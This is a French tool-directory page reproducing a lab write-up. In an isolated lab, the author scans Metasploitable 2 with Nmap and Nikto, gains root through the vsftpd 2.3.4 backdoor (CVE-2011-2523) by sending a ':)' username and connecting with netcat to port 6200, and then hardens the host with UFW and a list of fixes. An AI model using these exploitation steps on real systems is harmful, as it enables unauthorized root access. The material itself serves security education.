Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
network-security-lab — Laboratoire virtuel contrôlé d'attaque et de défense — exploitation de CVE-2011-2523, reconnaissance Nmap, analyse Nikto, durcissement UFW sur Metasploitable 2 | Kitploit
Outils/GitHubGitHub/amirmuhammadmarvi/network-security-lab
ReconnaissanceScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationAudit de ConfigurationSécurité WebSécurité RéseauTests d'IntrusionApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Labs et Pratique
GitHubamirmuhammadmarvi/network-security-lab

network-security-lab

Laboratoire virtuel contrôlé d'attaque et de défense — exploitation de CVE-2011-2523, reconnaissance Nmap, analyse Nikto, durcissement UFW sur Metasploitable 2

Voir le dépôt
3il y a 3 moisPas encore vérifié
Partager

🔬 Laboratoire de Sécurité Réseau

Un environnement virtuel contrôlé simulant des scénarios d'attaque et de défense réels

Python Platform CVE Status


📋 Aperçu

Ce laboratoire simule un test d'intrusion réel et un exercice de durcissement défensif dans un environnement virtuel totalement isolé. Il démontre le cycle de vie complet de la sécurité offensive — de la reconnaissance à l'exploitation — et les contrôles défensifs qui atténueraient chaque risque.

Résultat clé : Atteint un accès root complet sur la machine cible en moins de 60 secondes en exploitant une backdoor connue, sans aucun identifiant et sans outils spéciaux.


🏗 Environnement du Laboratoire

ComposantDétails
HyperviseurVMware Workstation
RéseauHost-Only / NAT (totalement isolé)
OS AttaquantUbuntu 24 LTS
OS CibleMetasploitable 2 (Linux 2.6.x)
IP Attaquant192.168.148.255
IP Cible192.168.148.130

🎯 Méthodologie

root@kitploit:~
Reconnaissance  →  Scan  →  Exploitation  →  Défense et Durcissement

🔍 Phase 1 — Reconnaissance

Scan de ports avec Nmap

root@kitploit:~
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt

Résultats clés — 23 ports ouverts au total :

PortServiceVersionRisque
21FTPvsftpd 2.3.4🔴 CRITIQUE — Backdoor connue (CVE-2011-2523)
22SSHOpenSSH 4.7p1🟡 MOYEN — Obsolète
23TelnetLinux telnetd🟠 ÉLEVÉ — Protocole en texte clair
80HTTPApache 2.2.8🟠 ÉLEVÉ — Plusieurs CVE
1524BindshellShell root🔴 CRITIQUE — Shell root ouvert
3306MySQL5.0.51a🟠 ÉLEVÉ — Base de données exposée
5900VNCProtocole 3.3🟠 ÉLEVÉ — Authentification faible
6667IRCUnrealIRCd🔴 CRITIQUE — Backdoor connue

Scan Web avec Nikto

root@kitploit:~
nikto -h http://192.168.148.130 -o nikto_before.txt

18 vulnérabilités trouvées, dont :

  • phpMyAdmin exposé publiquement
  • phpinfo.php fuyant la configuration complète du serveur
  • HTTP TRACE activé (attaques XST)
  • Indexation de répertoire activée sur /doc/, /test/
  • Apache 2.2.8 et PHP 5.2.4 obsolètes

💥 Phase 2 — Exploitation

CVE-2011-2523 — Backdoor vsftpd 2.3.4

vsftpd 2.3.4 contient une backdoor introduite via une compromission de la chaîne d'approvisionnement. Envoyer un nom d'utilisateur se terminant par :) fait que le serveur ouvre un shell root sur le port 6200.

root@kitploit:~
# Étape 1 — Déclencher la backdoor via FTP
ftp 192.168.148.130
# Nom d'utilisateur : backdoor:)   Mot de passe : n'importe quoi

# Étape 2 — Se connecter au shell généré
nc 192.168.148.130 6200

# Étape 3 — Vérifier l'accès
whoami
# → root

Résultat : Accès complet au niveau root obtenu en moins de 60 secondes — aucun identifiant, aucun framework d'exploit requis.

Impact : Un attaquant avec un accès root peut lire/modifier/supprimer tout fichier, installer des logiciels malveillants, exfiltrer des données ou pivoter vers d'autres hôtes sur le réseau.


🛡 Phase 3 — Défense et Durcissement

Pare-feu UFW — Politique de refus par défaut

root@kitploit:~
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp    # SSH uniquement
sudo ufw status verbose

Corrections recommandées

VulnérabilitéCorrection
Backdoor vsftpd 2.3.4Mettre à niveau vers vsftpd 3.x ou migrer vers SFTP
Shell root ouvert (port 1524)Désactiver immédiatement, auditer l'installation
Telnet (port 23)Désactiver — imposer SSH uniquement
phpMyAdmin exposéRestreindre par IP, exiger une authentification forte
MySQL exposé (port 3306)Lier à localhost, bloquer l'accès externe
VNC exposé (port 5900)Restreindre par IP ou désactiver
Indexation de répertoireApache : Options -Indexes
HTTP TRACEApache : TraceEnable off
Apache + PHP obsolètesMettre à niveau vers des versions LTS supportées

📄 Rapport Complet

Voir report.md pour l'évaluation complète — méthodologie complète, sorties de commandes, tableau des résultats, étapes d'exploitation et toutes les recommandations de correction.


⚠️ Avertissement Légal

Ce laboratoire a été mené dans un environnement virtuel totalement isolé en utilisant un logiciel intentionnellement vulnérable (Metasploitable 2). Toutes les techniques sont uniquement à des fins éducatives et de portfolio. Ne reproduisez pas sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite de tester.


🛠 Outils Utilisés

OutilObjectif
NmapScan de ports et détection de services
NiktoScan de vulnérabilités Web
NetcatConnexion au shell backdoor
UFWConfiguration du pare-feu basé sur l'hôte
Client FTPDéclenchement de la backdoor vsftpd
VMware WorkstationVirtualisation du laboratoire

Auteur : Amir Mohammad Marwi

Portfolio LinkedIn GitHub

Télécharger l’outil